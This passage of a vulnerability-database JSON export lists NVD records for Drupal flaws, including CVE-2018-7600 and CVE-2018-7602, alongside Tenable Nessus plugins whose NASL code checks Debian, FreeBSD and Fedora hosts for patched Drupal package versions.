"NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2019-10-09T23:42:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:drupal:drupal:6.38", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7602", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.38:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:46", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "title": "CVE-2018-7600", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-01T18:04:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:drupal:drupal:7.57", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-7600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.57:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T09:39:05", "description": "Multiple vulnerabilities have been found in the Drupal content\nmanagement framework. For additional information, please refer to the\nupstream advisory at https://www.drupal.org/sa-core-2018-001.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u17.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 19, "cvss3": {"score": 6.1, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}, "published": "2018-03-01T00:00:00", "title": "Debian DLA-1295-1 : drupal7 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2018-03-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1295.NASL", "href": "https://www.tenable.com/plugins/nessus/107076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1295-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107076);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n\n script_name(english:\"Debian DLA-1295-1 : drupal7 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been found in the Drupal content\nmanagement framework. For additional information, please refer to the\nupstream advisory at https://www.drupal.org/sa-core-2018-001.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u17.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/02/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-001\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u17\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-01T01:57:23", "description": "According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.57. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A flaw exists with the Drupal.checkPlain() function due to\n improper handling of HTML injection. A remote attacker, with a\n specially crafted request, could potentially execute arbitrary\n script code within the trust relationship between the browser and\n server. (CVE-2017-6927)\n\n - A flaw exists with the private file system due to improper checking\n of permissions when modules provided conflicting access. A remote\n attacker could potentially access sensitive files. (CVE-2017-6928)\n\n - A flaw exists with the bundled jQuery due to improper handling of\n Ajax requests. A remote attacker, with a specially crafted request,\n could potentially execute arbitrary script code within the trust\n relationship between the browser and server. (CVE-2017-6929)\n\n - A flaw exists with the language switcher block due to improper\n validation of user input. A context-dependent attacker, with a\n specially crafted link, could redirect a user to a malicious site.\n (CVE-2017-6932)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 4.7, "vector": "AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N"}, "published": "2018-03-01T00:00:00", "title": "Drupal 7.x < 7.57 Multiple Vulnerabilities (SA-CORE-2018-001)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_7_57.NASL", "href": "https://www.tenable.com/plugins/nessus/107088", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107088);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-6927\",\n \"CVE-2017-6928\",\n \"CVE-2017-6929\",\n \"CVE-2017-6932\"\n );\n script_bugtraq_id(103117, 103138);\n\n script_name(english:\"Drupal 7.x < 7.57 Multiple Vulnerabilities (SA-CORE-2018-001)\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.57. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A flaw exists with the Drupal.checkPlain() function due to\n improper handling of HTML injection. A remote attacker, with a\n specially crafted request, could potentially execute arbitrary\n script code within the trust relationship between the browser and\n server. (CVE-2017-6927)\n\n - A flaw exists with the private file system due to improper checking\n of permissions when modules provided conflicting access. A remote\n attacker could potentially access sensitive files. (CVE-2017-6928)\n\n - A flaw exists with the bundled jQuery due to improper handling of\n Ajax requests. A remote attacker, with a specially crafted request,\n could potentially execute arbitrary script code within the trust\n relationship between the browser and server. (CVE-2017-6929)\n\n - A flaw exists with the language switcher block due to improper\n validation of user input. A context-dependent attacker, with a\n specially crafted link, could redirect a user to a malicious site.\n (CVE-2017-6932)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-001\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.57 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-6932\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"fixed_version\" : \"7.57\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{\"xss\" : TRUE});\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-01T01:46:37", "description": "Multiple vulnerabilities have been found in the Drupal content\nmanagement framework. For additional information, please refer to the\nupstream advisory at https://www.drupal.org/sa-core-2018-001", "edition": 27, "cvss3": {"score": 6.1, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}, "published": "2018-02-26T00:00:00", "title": "Debian DSA-4123-1 : drupal7 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4123.NASL", "href": "https://www.tenable.com/plugins/nessus/106986", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4123. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106986);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_xref(name:\"DSA\", value:\"4123\");\n\n script_name(english:\"Debian DSA-4123-1 : drupal7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been found in the Drupal content\nmanagement framework. For additional information, please refer to the\nupstream advisory at https://www.drupal.org/sa-core-2018-001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4123\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u10\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-01T02:39:25", "description": "Drupal Security Team reports :\n\nCVE-2017-6926: Comment reply form allows access to restricted content\n\nCVE-2017-6927: JavaScript cross-site scripting prevention is\nincomplete\n\nCVE-2017-6928: Private file access bypass - Moderately Critical\n\nCVE-2017-6929: jQuery vulnerability with untrusted domains -\nModerately Critical\n\nCVE-2017-6930: Language fallback can be incorrect on multilingual\nsites with node access restrictions\n\nCVE-2017-6931: Settings Tray access bypass\n\nCVE-2017-6932: External link injection on 404 pages when linking to\nthe current page", "edition": 26, "cvss3": {"score": 8.1, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-02-26T00:00:00", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (57580fcc-1a61-11e8-97e0-00e04c1ea73d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:drupal8", "p-cpe:/a:freebsd:freebsd:drupal7"], "id": "FREEBSD_PKG_57580FCC1A6111E897E000E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/106994", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106994);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:46\");\n\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2017-6932\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (57580fcc-1a61-11e8-97e0-00e04c1ea73d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drupal Security Team reports :\n\nCVE-2017-6926: Comment reply form allows access to restricted content\n\nCVE-2017-6927: JavaScript cross-site scripting prevention is\nincomplete\n\nCVE-2017-6928: Private file access bypass - Moderately Critical\n\nCVE-2017-6929: jQuery vulnerability with untrusted domains -\nModerately Critical\n\nCVE-2017-6930: Language fallback can be incorrect on multilingual\nsites with node access restrictions\n\nCVE-2017-6931: Settings Tray access bypass\n\nCVE-2017-6932: External link injection on 404 pages when linking to\nthe current page\"\n );\n # https://vuxml.freebsd.org/freebsd/57580fcc-1a61-11e8-97e0-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?afdbf201\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.56\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"drupal8<8.4.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:19:31", "description": "-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6930", "CVE-2017-6927"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2018-7600\");\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the 